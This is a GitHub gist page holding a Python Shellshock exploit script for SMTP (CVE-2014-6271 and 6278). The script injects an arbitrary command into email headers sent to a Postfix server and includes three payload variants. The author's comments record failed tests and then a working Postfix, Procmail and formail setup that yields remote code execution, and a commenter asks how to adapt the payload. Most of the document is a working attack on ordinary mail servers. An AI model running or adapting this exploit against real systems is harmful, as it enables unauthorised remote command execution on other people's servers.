Skip to content

Instantly share code, notes, and snippets.

@claudijd
Last active August 7, 2021 11:45
Show Gist options
  • Save claudijd/33771b6c17bc2e4bc59c to your computer and use it in GitHub Desktop.
Save claudijd/33771b6c17bc2e4bc59c to your computer and use it in GitHub Desktop.
Postfix Shellshock PoC Testing
#!/bin/python
# Exploit Title: Shellshock SMTP Exploit
# Date: 10/3/2014
# Exploit Author: fattymcwopr
# Vendor Homepage: gnu.org
# Software Link: http://ftp.gnu.org/gnu/bash/
# Version: 4.2.x < 4.2.48
# Tested on: Debian 7 (postfix smtp server w/procmail)
# CVE : 2014-6271
from socket import *
import sys
def usage():
print "shellshock_smtp.py <target> <command>"
argc = len(sys.argv)
if(argc < 3 or argc > 3):
usage()
sys.exit(0)
rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]
headers = ([
"To",
"References",
"Cc",
"Bcc",
"From",
"Subject",
"Date",
"Message-ID",
"Comments",
"Keywords",
"Resent-Date",
"Resent-From",
"Resent-Sender"
])
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))
# banner grab
s.recv(2048*4)
def netFormat(d):
d += "\n"
return d.encode('hex').decode('hex')
data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)
data = netFormat("rcpt to:<root@localhost>")
s.send(data)
s.recv(2048*4)
data = netFormat("data")
s.send(data)
s.recv(2048*4)
data = ''
for h in headers:
# Original
data += netFormat(h + ":() { :; };" + cmd)
# Variant 1 - CVE-2014-6271
#data += netFormat(h + ":'() { :; }; " + cmd + "' bash -c : ")
# Variant 2 - CVE-2014-6278
#data += netFormat(h + ":'() { _; } >_[$($())] { " + cmd + "; }' bash -c :")
data += netFormat(cmd)
# <CR><LF>.<CR><LF>
data += "0d0a2e0d0a".decode('hex')
s.send(data)
s.recv(2048*4)
data = netFormat("quit")
s.send(data)
s.recv(2048*4)
@claudijd
Copy link
Author

claudijd commented Oct 9, 2014

OUTDATED - SEE BELOW

I've tested the original and the two variants without success.

Here are the relevant specs from my setup:

Bash - 4.2.37(1) (reportedly 4.2.x < 4.2.48 are vulnerable in this context)
Postfix - 3.9.6
Procmail - 3.22

Postfix config details (default from apt-get on Kali):

mailbox_command = procmail -a "$EXTENSION"

Logs show the email as being accepted and the procmail process is run against it without any failures.

The command I'm testing with is as follows:

python exploit.py 192.168.10.170 'touch /tmp/vulnerable'

RESULT: the above test case was a bust on Ubuntu/Kali because they symlink bash to dash.

@claudijd
Copy link
Author

Just tested on the following, still no code exec, but I can confirm that my .procmailrc is processing the email fully and foldering it on a non-root user.

$ cat ~/.procmailrc
VERBOSE=yes
MAILDIR=$HOME/Procmail
LOGFILE=$PMDIR/log
INCLUDERC=$PMDIR/test.rc
INCLUDERC=$PMDIR/lists.rc

:0:
* ^Subject:.*
testing

$ cat /etc/postfix/main.cf | grep mailbox_command
mailbox_command = /usr/sbin/procmail -a "$EXTENSION"

Bash = 4.1.2(1)
Postfix = 2.6.6
Procmail = 3.22

I also experimented with allowing postfix to have a default shell of /bin/bash

python exploit.py 192.168.10.# 'touch /tmp/vulnerable'

RESULT: the above test seems like it should work, but no code execution.

Also tested with a formail config...

:0:
* ^Subject:.*
| formail

RESULT: appears to process the mail fine, logs show formail execution, still not code execution of user supplied bash PoC headers.

@claudijd
Copy link
Author

Ok, finally got this working...

If a user is using a .procmailrc and using formail to export specific header attributes from the email, it's possible for an attacker to obtain code execution via the email headers set in the original PoC assuming the target address is modified to that of a valid user.

Here's a viable example I used to verify code execution in a Postfix + Procmail + Formail combination...

VERBOSE=yes
PATH=/bin:/usr/bin:/usr/local/bin
SHELL=/bin/bash
MAILDIR=$HOME/mail
PMDIR=$HOME/Procmail
LOGFILE=$PMDIR/log
INCLUDERC=$PMDIR/test.rc
INCLUDERC=$PMDIR/lists.rc
SHELL=/bin/sh

SUBJECT=`formail -xSubject:`
FROM=`formail -rt -xTo:`

:0:
* ^Subject:.*
| (formail)

@fahrishih
Copy link

Hi, very good post.

The format I'm trying exploit is slightly different.
Can you explain how to generate the payload according to the format?

    # Original
    data += netFormat(h + ":() { :; };" + cmd)
    
    # Variant 1 - CVE-2014-6271
    #data += netFormat(h + ":'() { :; }; " + cmd + "' bash -c : ")
 
    # Variant 2 - CVE-2014-6278
    #data += netFormat(h + ":'() { _; } >_[$($())] { " + cmd + "; }' bash -c :")

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment